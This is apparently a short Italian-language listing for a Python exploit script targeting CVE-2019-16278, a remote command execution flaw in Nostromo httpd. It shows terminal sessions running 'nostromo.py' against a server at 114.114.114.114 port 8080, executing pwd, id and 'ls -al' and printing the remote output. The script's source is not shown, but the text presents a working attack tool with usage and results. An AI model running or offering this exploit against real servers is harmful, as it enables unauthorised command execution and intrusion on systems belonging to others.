
Script di exploit in Python per CVE-2019-16278, una vulnerabilità di esecuzione remota di comandi in Nostromo httpd. Esegue comandi arbitrari su server vulnerabili tramite richieste HTTP appositamente create.
CVE-2019-16278 Nostromo httpd esecuzione comandi
➜ Downloads python nostromo.py 114.114.114.114 8080 pwd
/bin
➜ Downloads python nostromo.py 114.114.114.114 8080 id
uid=65534 gid=65534
➜ Downloads python nostromo.py 114.114.114.114 8080 "ls -al"
drwxr-xr-x 2 0 0 0 Apr 12 2013 .
drwxr-xr-x 16 0 0 0 Jan 1 1970 ..
lrwxrwxrwx 1 0 0 7 Apr 12 2013 ash -> busybox